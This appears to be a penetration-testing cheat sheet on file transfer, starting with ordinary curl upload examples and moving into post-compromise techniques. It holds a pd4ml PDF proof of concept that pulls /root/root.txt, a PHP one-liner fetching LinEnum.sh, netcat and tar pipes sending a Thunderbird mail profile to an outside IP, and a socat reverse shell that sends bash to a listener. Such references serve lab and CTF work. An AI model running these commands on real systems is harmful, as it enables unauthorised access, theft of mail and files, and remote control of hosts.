File Transfer

Listeners and binaries

curl

File Upload

curl -T example.txt https://example.com/upload

File Upload + POST

curl -T example.txt -X POST https://example.com/upload

File upload + Authentication

curl -u user:pass -T example.txt https://example.com/upload

File Upload + Token Authentication

curl -u :YOUR_TOKEN -T example.txt https://example.com/upload

File Upload + Custom Header

curl -H "Authorization: Bearer YOUR_TOKEN" -T example.txt https://example.com/upload

File Upload + Multiple Custom Headers

curl -H "Authorization: Bearer YOUR_TOKEN" -H "Content-Type: application/json" -T example.txt https://example.com/upload

Multiple File Uploads

curl -T file1.txt -T file2.txt https://example.com/upload

File Upload as Form submission

curl -F "file=@example.txt" https://example.com/upload

File Upload + Additional Query Parameters

curl -T example.txt "https://example.com/upload?user=alice&timestamp=2024"

File Upload + Redirect

curl -L -T example.txt https://example.com/upload

File Upload + Retry

curl --retry 5 -T example.txt https://example.com/upload

File Upload to FTP server

curl -T example.txt ftp://ftp.example.com/upload/

File Upload + Custom HTTP Method

curl -X PATCH -T example.txt https://example.com/upload

File transfer on compromised Apache servers

Copy a file into Apache Web Directory

• With the right permissions, you can copy the file to /var/www/html so it can be access from the URL http://<server-ip>/file.txt.

cp archivo.txt /var/www/html

Give ownership to the web user

sudo chown www-data:www-data /var/www/html/archivo.txt

Set the file to be read by everyone

sudo chmod 644 /var/www/html/archivo.txt

Uploading via Apache (web interface)

• Ensure the appropriate upload_max_filesize and post_max_size directives are set in the php.ini file.

• Normally is located here /etc/php/7.x/apache2/php.ini

upload_max_filesize = 50M
post_max_size = 50M

Use pd4ml.jar to exfill files attaching then to the PDF

POC

<html>
  <pd4ml:attachment src="/root/root.txt"/>
</html>

With PHP code execution

One liner

php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

Secure Copy Protocol scp

From local machine to remote host

scp localfile username@remotehost:/path/to/destination/

From remote host to local machine

scp username@remotehost:/path/to/remotefile /local/path/

Specific Port

scp -P 47502 linpeas.sh user1@83.136.252.198:/home/user1

With key

scp -i ~/.ssh/key linpeas.sh professor@10.10.10.131:/home/professor/

From local to Apache Server

scp archivo.txt user@remote-server:/var/www/html/

Python Web Server

python3 -m http.server 443

curl

curl -o IP:Port/file

wget

wget IP:Port/file

Using Netcat

Host

nc -lvp <Local_PORT> > file

Client

nc <Target_IP> <port> < file

With cat

cat <file> | nc Target_IP 443

Use tar for directories

tar -cf - .thunderbird | nc 10.10.16.10 4445

Using Socat

Listener

socat file:`tty`,raw,echo=0 tcp-listen:4444

Target Machine

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444